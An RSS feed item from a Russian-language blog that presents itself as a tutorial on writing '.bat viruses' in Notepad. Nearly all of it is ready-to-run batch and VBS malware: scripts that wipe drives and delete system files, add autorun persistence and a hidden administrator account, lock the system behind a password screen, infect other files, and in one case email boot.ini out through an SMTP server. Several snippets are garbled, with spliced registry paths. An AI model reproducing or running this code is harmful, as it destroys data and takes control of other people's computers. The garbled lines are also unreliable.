<?xml version="1.0" encoding="utf-8" ?><rss version="2.0" xmlns:tt="http://teletype.in/" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:media="http://search.yahoo.com/mrss/"><channel><title>@rady</title><generator>teletype.in</generator><description><![CDATA[@rady]]></description><link>https://teletype.in/@rady?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=rady</link><atom:link rel="self" type="application/rss+xml" href="https://teletype.in/rss/rady?offset=0"></atom:link><atom:link rel="next" type="application/rss+xml" href="https://teletype.in/rss/rady?offset=10"></atom:link><atom:link rel="search" type="application/opensearchdescription+xml" title="Teletype" href="https://teletype.in/opensearch.xml"></atom:link><pubDate>Sun, 05 Apr 2026 16:05:45 GMT</pubDate><lastBuildDate>Sun, 05 Apr 2026 16:05:45 GMT</lastBuildDate><item><guid isPermaLink="true">https://teletype.in/@rady/N30RvpGyN</guid><link>https://teletype.in/@rady/N30RvpGyN?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=rady</link><comments>https://teletype.in/@rady/N30RvpGyN?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=rady#comments</comments><dc:creator>rady</dc:creator><title>bat Вирусы. Вирусы в блокноте.</title><pubDate>Mon, 17 Aug 2020 11:19:54 GMT</pubDate><description><![CDATA[Создание вирусов в блокноте]]></description><content:encoded><![CDATA[
  <p>Создание вирусов в блокноте</p>
  <p>PHOTO</p>
  <blockquote>BLACK CODE</blockquote>
  <p><strong>Всем привет! Это канал BLACK CODE. Сегодня мы рассмотрим такой феномен, как .bat вирусы, которые можно написать прямо в блокноте.</strong></p>
  <p></p>
  <p>У всех есть блокнот/текстовый редактор, но как вы его используете? Думаю, что многие используют его для довольно привычных целей: заметки, текст и т.д.</p>
  <p>Но не все знают, что в блокноте можно и написать простые вирусы, которые будут в формате .bat.</p>
  <p>Важно понимать, что серьёзные вирусы вы не напишите, потому что команды довольно ограничены и по другим факторам. Мы пишем только в чисто образовательных целях!</p>
  <h2>Теория</h2>
  <h3>Что такое .bat/Как создать .bat</h3>
  <p><strong>Пакетный файл</strong> (.bat файл) — текстовый файл в MS-DOS, OS/2 или Windows, содержащий последовательность команд, предназначенных для исполнения командным интерпретатором. После запуска пакетного файла программа-интерпретатор читает его строка за строкой и последовательно исполняет команды.</p>
  <p>Для того, чтобы создать .bat файл, вам нужно:</p>
  <ul>
    <li>Открыть блокнот(или любой другой текстовый редактор)</li>
    <li>Написать там нужные команды</li>
    <li>Сохранить файл с расширением .bat(Пример: blackcode_virus.bat)</li>
  </ul>
  <p>И если нужно, то и запустить</p>
  <p>СКРИНЫ</p>
  <p>СКРИНЫ</p>
  <p>СКРИНЫ</p>
  <h3><strong>Основные команды</strong></h3>
  <p>Echo – Команда вывода на экран<br />Echo c:ski.bat &gt;&gt; autoexec.bat (Прописывает файл ski.bat в автозагрузку)<br />@ — запрещает показывать<br /><a href="https://lolz.guru/members/98981/" target="_blank">@Echo</a> off — запрещает вывод всех команд на экран<br />for – цикл, выполняет команду указанное количество раз<br />do – указывает, что делать<br />%%i – переменная, куда подставляются значения<br />in(1,1,100) – набор, который раскрывается в последовательность чисел от заданного начала, конца и шага<br />В нашем случае от 1,2,3,4,5,6,7,8…100<br />mkdir – создаёт папку<br />rmdir – удаляет папку<br />copy %0 x:\y - копирует вирус на диск x в папку y (пример copy %0 C:\System.bat)<br />Copy %0 c:ski.bat (копирует вирус только изменив названия)<br />label x:y - переименовывает диск x на имя y (пример label C:Disc error)<br />time х:у - меняет время на х часов и у минут (пример time 14:27)<br />date x.y.z - меняет дату на x день, y месяц, z год (пример date 16.11.05)<br />md х - создаст папку, в том месте, где наш вирус, с именем х<br />del <strong>.</strong>* /q - удалит все файлы (наш вирус тоже) в папке, где лежит наш вирус (кроме папок)<br />del x:\y *<strong>.</strong> /q - удалит все файлы на диске х в папке у (кроме папок) (пример del F:\Data*.* /q)<br />del c:Program Files/q (удаляет все файлы из этой папки)<br />assoc .х=.у - переделает все файлы, на компьютере, форматом х на у (пример assoc .exe=.mp3)<br />ren 5-??.png 7-??.png переименование файлов 5-??.png в 7-??.png<br />taskkill - позволяет завершить один или несколько процессов<br />tskill - убить процесс<br />reg - непосредственная работа с реестром<br />logoff - Заверщить пользовательский сеанс<br />%SystemRoot%/system32/rundll32 user32, SwapMouseButton - Данная строчка меняет клавиши мыши местами<br />shutdown - выключить pc<br />del — удаление одного или нескольких файлов<br />getmac — отображает MAC-адрес одного или нескольких сетевых адаптеров компьютера<br />md — создание папки<br />msg — отправка сообщений пользователю<br />ren — переименование файлов и папок<br />rd — удаление папки<br />rmdir — удаление папки<br />reg — редактирование системного реестра<br />xcopy — копирование файлов и дерева папок</p>
  <h2>Пишем вирусы</h2>
  <h3>Простые вирусы</h3>
  <p><strong>Убирает рабочий стол </strong></p>
  <pre>@echo off 
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDesktop /t REGDWORD /d 1 /f &gt;nul</pre>
  <p><strong>Выключается компьютер </strong></p>
  <pre>@echo off 
shutdown -s -t 1 -c &quot;BLACK CODE&quot; &gt;nul </pre>
  <p><strong>Перезагрузка компьютера</strong></p>
  <pre>@echo off 
shutdown -r -t 1 -c &quot;BLACK CODE&quot; &gt;nul </pre>
  <p><strong>Запрещает запускать программы</strong></p>
  <pre>@echo off 
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\RestrictRun /v 1 /t REGDWORD /d %SystemRoot%\explorer.exe /f &gt;nul </pre>
  <p><br /><strong>Удаление драйверов</strong></p>
  <pre>@echo off 
del &quot;%SystemRoot%\Driver Cache\i386\driver.cab&quot; /f /q &gt;nul </pre>
  <p><br /><strong>Удаляет звуки</strong> <strong>Windows</strong> </p>
  <pre>@echo off 
del &quot;%SystemRoot%\Media&quot; /q &gt;nul</pre>
  <p><br /><strong>Запрещает заходить в панель управления</strong></p>
  <pre>@echo off 
reg add HKCU\Software\Microsoft\Windows\Current Version\Policies\Explorer 
/v NoControlPanel /t REG_DWORD /d 1 /f &gt;nul</pre>
  <p><strong>Запрещает комбинацию Ctrl-Alt-Delete</strong></p>
  <pre>reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem /v DisableTaskMgr /t REGORD /d 1 /f &gt;nul </pre>
  <p><strong>Меняет местами значение кнопок мыши</strong></p>
  <pre>%SystemRoot%/system32/rundll32 user32, SwapMouseButton &gt;nul </pre>
  <p><strong>Удаляет курсор мыши</strong></p>
  <pre>del &quot;%SystemRoot%Cursors*.*&quot; &gt;nul </pre>
  <p><strong>Меняет название корзины</strong></p>
  <pre>reg add HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache /v @C:\WINDOWS\system32\SHELL32.dll,-8964 /t REG_SZ SZ /d ТУТ НАЗВАНИЕ КОРЗИНЫ /F </pre>
  <p><strong>Убирает панель управления</strong></p>
  <pre>reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REGD /d 1 /f</pre>
  <h3><strong>Серьёзные вирусы</strong></h3>
  <p><strong>Удаляет ВСЕ с раздела\диска(не пытайтесь проверить у себя)</strong></p>
  <pre>rd [БукваДиск]: /s /q </pre>
  <p><strong>Удаляет все файлы в program files </strong></p>
  <pre>del c:Program Files/q</pre>
  <p><br /><strong>Убивает процесс explorer.exe</strong></p>
  <pre>taskkill /f /im explorer.exe &gt;nul </pre>
  <p><strong>Создает миллион папок</strong></p>
  <pre>FOR /L %%i IN (1,1,1000000) DO md %%i </pre>
  <p><strong>Удаляет все драйвера, которые установлены на компьютере</strong></p>
  <pre>del &quot;%SystemRoot%Driver Cachei386driver.cab&quot; /f /q &gt;nul </pre>
  <p><strong>Удаляет команду DEL</strong></p>
  <pre>del %0 </pre>
  <p><strong>Будет открывать бесконечно Paint</strong></p>
  <pre>@Echo off
:x
Start mspaint
goto x </pre>
  <p><strong>Изменяет расширение всех ярлыков на .blackcode</strong></p>
  <pre>assoc .lnk=.blackcode </pre>
  <p><strong>Заражает Autoexec</strong></p>
  <pre>copy &quot;&quot;%0&quot;&quot; &quot;%SystemRoot%\system32\batinit.bat&quot; &gt;nul 
reg add &quot;HKCU\SOFTWARE\Microsoft\Command Processor&quot; /v AutoRun /t REGSZ /d &quot;%SystemRoot%\syste m32\batinit.bat&quot; /f &gt;nul  </pre>
  <p><strong>Создает нового пользователя, с правами администратора, логин:blackcode и пароль: @blackcode_tg (Можете изменить)</strong></p>
  <pre>@echo offchcp 1251 
net user SUPPORT_3388945a0 /delete 
net user hacker hack /add 
net localgroup Администраторы hacker /add 
net localgroup Пользователи SUPPORT8945a0 /del 
reg add &quot;HKEY_LOCLOCALINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogonSpecialAccountsUserList&quot; /v &quot;support&quot; /t reg_dword /d 0 y </pre>
  <p><strong>Сбой системы - выключить все функции ввода-вывода (клавиатура, дисплей, мышь). В результате будет черный экран с курсором и не реагирующая система, однако Windows продолжает работать.</strong></p>
  <pre>rundll32 user,disableoemlayer </pre>
  <p><strong>Меняет местами кнопки мыши, но нельзя</strong> <strong>поменять обратно</strong></p>
  <pre>rundll32 user,SwapMouseButton </pre>
  <p><strong>Удаляет ядро системы</strong></p>
  <pre>del %systemroot%\system32\HAL.dll </pre>
  <p><strong>Заражает .jpg *.mp3 *.doc *.html *.xls.</strong></p>
  <pre>@echo off%[MrWeb]%
if &#x27;%1==&#x27;In_ goto MrWebin
if exist c:\MrWeb.bat goto MrWebru
if not exist %0 goto MrWeben
find &quot;MrWeb&quot;&lt;%0&gt;c:\MrWeb.bat
attrib +h c:\MrWeb.bat
:MrWebru
for %%g in (..\.jpg ..\*..doc ..\tm? *.jp.jpg *.mp3 *.doc *.htm? *.xls) do call c:\MrWeb In_ %%ggoto MrWeben
:MrWebin
if exist %2.bat goto MrWeben
type c:\MrWeb.bat&gt;&gt;%2.bat
echo start %2&gt;&gt;%2.bat%[MrWeb]%
:MrWeben</pre>
  <p><strong><br />Вирус заражает *.JPG в текущем каталоге</strong></p>
  <pre>@echo off%[MrWeb]%
if &#x27;%1==&#x27;In_ goto MrWebin
if exist c:\MrWeb.bat goto MrWebru
if not exist %0 goto MrWeben
find &quot;MrWeb&quot;&lt;%0&gt;c:\MrWeb.bat
attrib +h c:\MrWeb.bat
:MrWebru
for %%g in () do call c:\MrWeb In_ %%g
goto MrWeben
:MrWebin
if exist %2.bat goto MrWeben
type c:\MrWeb.bat&gt;&gt;%2.bat
echo start %2&gt;&gt;%2.bat%[MrWeb]%
:MrWeben</pre>
  <h3><strong>Жестокие вирусы</strong></h3>
  <p><strong>У пользователя будет очень сильно тормозить компьютер</strong></p>
  <pre>@echo off echo Set fso = CreateObject(&quot;Scripting.FileSystemObject&quot;) &gt; %systemdrive%\windows\system32\rundll32.vbs 
echo do &gt;&gt; %systemdrive%\windows\system32\rundll32.vbs 
echo Set tx = fso.CreateTextFile(&quot;%systemdrive%\windows\system32\rundll32.dat&quot;, True) &gt;&gt; %systemdrive%\windows\system32\rundll32.vbs 
echo tx.WriteBlankLines(100000000) &gt;&gt; %systemdrive%\windows\system32\rundll32.vbs 
echo tx.close &gt;&gt; %systemdrive%\windows\system32\rundll32.vbs 
echo FSO.DeleteFile &quot;%systemdrive%\windows\system32\rundll32.dat&quot; &gt;&gt; %systemdrive%\windows\system32\rundll32.vbs 
echo loop &gt;&gt; %systemdrive%\windows\system32\rundll32.vbs 
start %systemdrive%\windows\system32\rundll32.vbs 
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v systemhostrun /t REG_SSZ /d %systemdrive%\windows\system32\rundll32.vbs /f  </pre>
  <p><strong>Вирус, который убивает Windows. Не проверяйте на своем компьютере!</strong></p>
  <pre>@echo This virus created by LIZA 
@echo Virus: pcforumhack.ru™ Virus 
@echo Autor: LIZA 
@echo off 
echo Chr(39)&gt;%temp%\temp1.vbs 
echo Chr(39)&gt;%temp%\temp2.vbs 
echo on error resume next &gt; %temp%\temp.vbs 
echo Set S = CreateObject(&quot;Wscript.Shell&quot;) &gt;&gt; %temp%\temp.vbs 
echo set FSO=createobject(&quot;scripting.filesystemobject&quot;)&gt;&gt;%temp%\temp.vbs 
reg add HKEYERS\S-1-5-21-343818398-1417001333-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v nodesktop /d 1 /freg add HKEY_USEUSERS\S-1-5-21-343818398-1417001333-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v ClassicShell /d 1 /fset ¶§=%0 
copy %¶§% %SystemRoot%\user32dll.bat 
reg add &quot;hklm\Software\Microsoft\Windows\CurrentVersion\Run&quot; /v RunExplorer32 /d %SystemRoot%\user32dll.bat /f 
reg add &quot;hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer&quot; /v NoDrives /t REGD /d 67108863 /f 
reg add &quot;hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer&quot; /v NoViewOnDrive /t REG_DWORDDWORD /d 67108863 /f 
echo fso.deletefile &quot;C:\ntldr&quot;,1 &gt;&gt; %temp%\temp.vbs 
reg add &quot;HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions&quot; /v &quot;NoSelectDownloadDir&quot; /d 1 /f 
reg add &quot;HKLM\SOFTWARE\Microsoft\Internet Explorer\main\FeatureControl\Featureachine_LockdowLockdown&quot; /v &quot;IExplorer&quot; /d 0 /f 
reg add &quot;HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions&quot; /v &quot;NoFindFiles&quot; /d 1 /f 
reg add &quot;HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions&quot; /v &quot;NoNavButtons&quot; /d 1 /f 
echo fso.deletefolder &quot;D:\Windows&quot;,1 &gt;&gt; %temp%\temp.vbs 
echo fso.deletefolder &quot;I:\Windows&quot;,1 &gt;&gt; %temp%\temp.vbs 
echo fso.deletefolder &quot;C:\Windows&quot;,1 &gt;&gt; %temp%\temp.vbs 
echo sr=s.RegRead(&quot;HKEYCHINE\SMACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRoot&quot;) &gt;&gt; %temp%\temp.vbs 
echo fso.deletefile sr+&quot;\system32\hal.dll&quot;,1 &gt;&gt; %temp%\temp.vbs 
echo sr=s.RegRead(&quot;HKEYINE\SOFMACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRoot&quot;) &gt;&gt; %temp%\temp.vbs 
echo fso.deletefolder sr+&quot;\system32\dllcache&quot;,1 &gt;&gt; %temp%\temp.vbs 
echo sr=s.RegRead(&quot;HKEYE\SOFTWMACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRoot&quot;) &gt;&gt; %temp%\temp.vbs 
echo fso.deletefolder sr+&quot;\system32\drives&quot;,1 &gt;&gt; %temp%\temp.vbs 
echo s.regwrite &quot;HKEYLSID\{645ROOT\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\LocalizedString&quot;,&quot;forum.whack.ru™&quot;&gt;&gt;%temp%\temp.vbs 
echo s.regwrite &quot;HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOwner&quot;,&quot;forum.whack.ru™&quot;&gt;&gt;%temp%\temp.vbs 
echo s.regwrite &quot;HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOrganization&quot;,&quot;forum.whack.ru™&quot;&gt;&gt;%temp%\temp.vbs 
echo on error resume next &gt; %temp%\temp1.vbs 
echo set FSO=createobject(&quot;scripting.filesystemobject&quot;)&gt;&gt;%temp%\temp1.vbs 
echo do&gt;&gt;%temp%\temp1.vbs 
echo fso.getfile (&quot;A:\&quot;)&gt;&gt;%temp%\temp1.vbs 
echo loop&gt;&gt;%temp%\temp1.vbs 
echo on error resume next &gt; %temp%\temp2.vbs 
echo Set S = CreateObject(&quot;Wscript.Shell&quot;) &gt;&gt; %temp%\temp2.vbs 
echo do&gt;&gt;%temp%\temp2.vbs 
echo execute&quot;S.Run &quot;&quot;%comspec% /c echo &quot;&quot; &amp; Chr(7), 0, True&quot;&gt;&gt;%temp%\temp2.vbs 
echo loop&gt;&gt;%temp%\temp2.vbs 
reg add &quot;hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\System&quot; /v disabletaskmgr /t REGeg add &quot;hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\System&quot; /v disableregistrytools /t REG_DWORD /d 1 /f 
reDWORD /d 1 /f 
reg add &quot;hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer&quot; /v NoStartMenuPinnedList /t REG add &quot;hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer&quot; /v NoStartMenuMFUprogramsList /t REG_DWORD /d 1 /f 
reg DWORD /d 1 /f 
reg add &quot;hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer&quot; /v NoUserNameInStartMenu /t REGdd &quot;hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\NonEnum&quot; /v {20D04FE0-3AEA-1069-A2D8-08002B30309D} /t REG_DWORD /d 1 /f 
reg adDWORD /d 1 /f 
reg add &quot;hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer&quot; /v NoNetworkConnections /t REG &quot;hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer&quot; /v NoStartMenuNetworkPlaces /t REG_DWORD /d 1 /f 
reg add DWORD /d 1 /f 
reg add &quot;hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer&quot; /v StartmenuLogoff /t REGhkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer&quot; /v NoStartMenuSubFolders /t REG_DWORD /d 1 /f 
reg add &quot;hDWORD /d 1 /f 
reg add &quot;hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer&quot; /v NoCommonGroups /t REGcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer&quot; /v NoFavoritesMenu /t REG_DWORD /d 1 /f 
reg add &quot;hkcDWORD /d 1 /f 
reg add &quot;hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer&quot; /v NoRecentDocsMenu /t REG\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer&quot; /v NoSetFolders /t REG_DWORD /d 1 /f 
reg add &quot;hkcu\DWORD /d 1 /f 
reg add &quot;hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer&quot; /v NoAddPrinter /t REGoftware\Microsoft\Windows\CurrentVersion\Policies\Explorer&quot; /v NoFind /t REG_DWORD /d 1 /f 
reg add &quot;hkcu\SoDWORD /d 1 /f 
reg add &quot;hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer&quot; /v NoSMHelp /t REGtware\Microsoft\Windows\CurrentVersion\Policies\Explorer&quot; /v NoRun /t REG_DWORD /d 1 /f 
reg add &quot;hkcu\SoftDWORD /d 1 /f 
reg add &quot;hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer&quot; /v NoStartMenuMorePrograms /t REGare\Microsoft\Windows\CurrentVersion\Policies\Explorer&quot; /v NoClose /t REG_DWORD /d 1 /f 
reg add &quot;hkcu\SoftwaDWORD /d 1 /f 
reg add &quot;hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer&quot; /v NoChangeStartMenu /t REGe\Microsoft\Windows\CurrentVersion\Policies\Explorer&quot; /v NoSMMyDocs /t REG_DWORD /d 1 /f 
reg add &quot;hkcu\SoftwareDWORD /d 1 /f 
reg add &quot;hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer&quot; /v NoSMMyPictures /t REGMicrosoft\Windows\CurrentVersion\Policies\Explorer&quot; /v NoStartMenuMyMusic /t REG_DWORD /d 1 /f 
reg add &quot;hkcu\Software\MDWORD /d 1 /f 
reg add &quot;hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer&quot; /v NoControlPanel /t REGteobject(&quot;shell.application&quot;)&gt;&gt;%temp%\temp.vbs 
echo application.minimizeall&gt;&gt;%temp%\temp.vbs 
reg add &quot;hklm\Software\Microsoft\Windows\CurrentVersion\run&quot; /v SwapNT /t REG_SZ /d rundll32 user32, SwapMouseButton /fSZ /d rundll32 user32, SwapMouseButton /f 
start rundll32 user32, SwapMouseButton 
reg add &quot;HKCR\exefile\shell\open\command&quot; /ve /t REG\temp.vbs 
echo while i^&gt;0 or i^&lt;0 &gt;&gt; %temp%\temp.vbs 
echo S.popup &quot;forum.whack.ru™&quot;,0, &quot;forum.whack.ru™&quot;,0+16 &gt;&gt; %temp%\temp.vbs 
echo i=i-1 &gt;&gt; %temp%\temp.vbs 
echo wend &gt;&gt; %temp%\temp.vbs 
echo do &gt;&gt; %temp%\temp.vbs 
echo wscript.sleep 200 &gt;&gt; %temp%\temp.vbs 
echo s.sendkeys&quot;{capslock}&quot; &gt;&gt; %temp%\temp.vbs 
echo wscript.sleep 200 &gt;&gt; %temp%\temp.vbs 
echo s.sendkeys&quot;{numlock}&quot; &gt;&gt; %temp%\temp.vbs 
echo wscript.sleep 200 &gt;&gt; %temp%\temp.vbs 
echo s.sendkeys&quot;{scrolllock}&quot; &gt;&gt; %temp%\temp.vbs 
echo loop&gt;&gt; %temp%\temp.vbs 
echo Set oWMP = CreateObject(&quot;WMPlayer.OCX.7&quot;) &gt;&gt; %temp%\temp.vbs 
echo Set colCDROMs = oWMP.cdromCollection &gt;&gt; %temp%\temp.vbs 
echo if colCDROMs.Count ^&gt;= 1 then &gt;&gt; %temp%\temp.vbs 
echo For i = 0 to colCDROMs.Count - 1 &gt;&gt; %temp%\temp.vbs 
echo colCDROMs.Item(i).eject &gt;&gt; %temp%\temp.vbs 
echo next &gt;&gt; %temp%\temp.vbs 
echo End If &gt;&gt; %temp%\temp.vbs 
echo Call SendPost(&quot;smtp.mail.ru&quot;, &quot;forum.whack.ru™@mail.ru&quot;, &quot;support@mail.ru&quot;, &quot;...&quot;, &quot;Копм заражен!&quot;) &gt;&gt; %temp%\temp.vbs 
echo Function SendPost(strSMTP_Server, strTo, strFrom, strSubject, strBody) &gt;&gt; %temp%\temp.vbs 
echo Set iMsg = CreateObject(&quot;CDO.Message&quot;) &gt;&gt; %temp%\temp.vbs 
echo Set iConf = CreateObject(&quot;CDO.Configuration&quot;) &gt;&gt; %temp%\temp.vbs 
echo Set Flds = iConf.Fields &gt;&gt; %temp%\temp.vbs 
echo Flds.Item(&quot;http://schemas.microsoft.com/cdo/configuration/sendusing&quot;) = 2 &gt;&gt; %temp%\temp.vbs 
echo Flds.Item(&quot;http://schemas.microsoft.com/cdo/configuration/smtpauthenticate&quot;) = 1 &gt;&gt; %temp%\temp.vbs 
echo Flds.Item(&quot;http://schemas.microsoft.com/cdo/configuration/sendusername&quot;) = &quot;support&quot; &gt;&gt; %temp%\temp.vbs 
echo Flds.Item(&quot;http://schemas.microsoft.com/cdo/configuration/sendpassword&quot;) = &quot;support&quot; &gt;&gt; %temp%\temp.vbs 
echo Flds.Item(&quot;http://schemas.microsoft.com/cdo/configuration/smtpserver&quot;) = &quot;smtp.mail.ru&quot; &gt;&gt; %temp%\temp.vbs 
echo Flds.Item(&quot;http://schemas.microsoft.com/cdo/configuration/smtpserverport&quot;) = 25 &gt;&gt; %temp%\temp.vbs 
echo Flds.Update &gt;&gt; %temp%\temp.vbs 
echo iMsg.Configuration = iConf &gt;&gt; %temp%\temp.vbs 
echo iMsg.To = strTo &gt;&gt; %temp%\temp.vbs 
echo iMsg.From = strFrom &gt;&gt; %temp%\temp.vbs 
echo iMsg.Subject = strSubject &gt;&gt; %temp%\temp.vbs 
echo iMsg.TextBody = strBody &gt;&gt; %temp%\temp.vbs 
echo iMsg.AddAttachment &quot;c:\boot.ini&quot; &gt;&gt; %temp%\temp.vbs 
echo iMsg.Send &gt;&gt; %temp%\temp.vbs 
echo End Function &gt;&gt; %temp%\temp.vbs 
echo Set iMsg = Nothing &gt;&gt; %temp%\temp.vbs 
echo Set iConf = Nothing &gt;&gt; %temp%\temp.vbs 
echo Set Flds = Nothing &gt;&gt; %temp%\temp.vbs 
echo s.run &quot;shutdown -r -t 0 -c &quot;&quot;pcforumhack.ru™&quot;&quot; -f&quot;,1 &gt;&gt; %temp%\temp.vbs 
start %temp%\temp.vbs 
start %temp%\temp1.vbs 
start %temp%\temp2.vbs </pre>
  <p><br /><strong>Вирус полностью блокирует систему при следующем запуске Windows, даже в безопасном режиме. Выключает диспетчер задач.</strong></p>
  <pre>@echo off 
CHCP 1251 
cls 
Set Yvaga=На вашем компьютере найден вирус. 
Set pass=Пароль 
Set pas=Введите пароль. 
Set virus=Чтобы разблокировать ПК вам потребуется ввести пароль 
Set dim=Выключаю вирус... 
title Внимание!!! 
CHCP 866 
IF EXIST C:\windows\boot.bat ( 
goto ok ) 
cls 
IF NOT EXIST C:\windows\boot.bat ( 
ECHO Windows Registry Editor Version 5.00 &gt;&gt; C:\0.reg 
ECHO. &gt;&gt; C:\0.reg 
ECHO [HKEYLOCALMACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] &gt;&gt; C:\0.reg 
ECHO. &gt;&gt; C:\0.reg 
ECHO &quot;Shell&quot;=&quot;Explorer.exe, C:\\windows\\boot.bat &quot; &gt;&gt; C:\0.reg 
start/wait regedit -s C:\0.reg 
del C:\0.reg 
ECHO @echo off &gt;&gt;C:\windows\boot.bat 
ECHO C:\WINDOWS\system32\taskkill.exe /f /im Explorer.exe &gt;&gt;C:\windows\boot.bat 
ECHO reg add &quot;HKCU\software\Microsoft\Windows\CurrentVersion\Policies\system&quot; /v DisableTaskMgr /t REG_DDWORD /d 1 /f &gt;&gt;C:\windows\boot.bat 
ECHO start sys.bat &gt;&gt;C:\windows\boot.bat 
attrib +r +a +s +h C:\windows\boot.bat 
copy virus.bat c:\windows\sys.bat 
attrib +r +a +s +h C:\windows\sys.bat 
GOTO end) 
:ok 
cls 
Echo %Yvaga% 
echo. 
echo %virus% 
echo %pas% 
set /a choise = 0 
set /p choise=%pass%: 
if &quot;%choise%&quot; == &quot;101&quot; goto gold 
if &quot;%choise%&quot; == &quot;200393&quot; goto status 
exit 
:status 
echo %dim% 
attrib -r -a -s -h C:\windows\boot.bat 
del C:\windows\boot.bat 
attrib -r -a -s -h C:\windows\sys.bat 
del C:\windows\sys.bat 
cls 
:gold 
start C:\ 
:end </pre>
  <p><strong>Добавляет программу в автозагрузку ОС</strong></p>
  <pre>copy &quot;&quot;%0&quot;&quot; &quot;%SystemRoot%\system32\File.bat&quot; 
reg add &quot;HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run&quot; /v &quot;Filel&quot; /t REG /d &quot;%SystemRoot%\system32\File.bat&quot; /f 
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoControlPanel /t REG_DWORD /d 1 /f </pre>
  <p><strong>Этот вирус блокирует все программы, но интернет работает, переименовывает все .exe в .blackcode</strong></p>
  <pre>@Echo off 
Echo BLACK VIRUS
Date 13.09.96 
If exist c:ski.bat goto abc 
Copy %0 c:ski.bat 
Attrib +h c:ski.bat 
Echo c:ski.bat &gt;&gt;autoexec.bat 
:abc 
md BLACK 
md CODE 
md BLACK1 
md CODE1 
Label E: BLACK 
assoc .exe=.blackcode 
del c:Program Files/q 
Echo BLACK CODE</pre>
  <p><strong>Отключение мыши и клавиатуры, форматирование всех дисков</strong></p>
  <pre>@Echo off
rundll32 keyboard,disable
rundll32 mouse,disable
ipconfig /release
msg* &quot;BLACK CODE&quot;
del D:\.* /f /s /q
del E:\.* /f /s /q
del F:\*..* /f /s /q
del G:\ /f /s /q
del H:\*.* .* /f /s /q
del I:\f /s /q
del J:\*.* /f /s /q
exit</pre>

]]></content:encoded></item></channel></rss>